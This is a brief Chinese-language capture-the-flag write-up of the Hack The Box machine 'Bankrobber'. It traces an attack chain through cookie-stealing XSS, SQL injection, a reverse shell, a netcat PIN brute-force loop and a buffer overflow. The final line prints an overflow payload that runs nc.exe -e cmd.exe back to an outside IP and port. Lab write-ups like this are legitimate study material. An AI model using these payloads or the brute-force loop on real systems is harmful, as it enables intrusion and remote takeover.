Hackthebox——Bankrobber
- 2020 年 3 月 6 日
- 筆記
nmap掃描到80、443、445、3306
web上可註冊賬號,註冊後登陸,看到一個TransferE-coin的功能。
隨便填了一點信息發送,提示管理員會看這個請求。
抓到這個請求,看到cookie這裡是用戶名和密碼的base64加密,想到通過xss獲得管理員的cookie來得到管理員的用戶名密碼。
構造payload後發包,成功獲得管理員cookie,解密後獲得管理員密碼,成功登陸管理員賬號。
登陸管理員賬號後,第一個看到note.txt,告訴我們網站的路徑。
頁面最下面有個backdoorchecker,試試執行命令,提示我們只能在localhost執行。
頁面中間有個搜索user的功能,測試後發現存在sql注入。
注入查看到backdoorchecker.php的源碼。從源碼內容中可知要執行命令只能從本地發送請求,前三個字符必須是dir。
結合之前那個xss的漏洞,構造一個反彈shell的payload,發送後成功反彈sehll,獲得user.txt。
嘗試了幾個提權方法都沒成功,後來在C盤根目錄下看到一個可疑的程序,並且這個程序正在運行
轉發端口到本地,nc連接本地910端口,提示需要4位的PIN碼
forn in {0..9}{0..9}{0..9}{0..9};do echo $n;echo $n | nc -nv 127.0.0.1910; done
爆破得到PIN碼,連接後測試發現輸入e-coins存在溢出
利用溢出成功獲得system權限,獲得root.txt。
12345678901234567890123456789012C:UsersCortinnc.exe-e cmd.exe 10.10.14.149 4447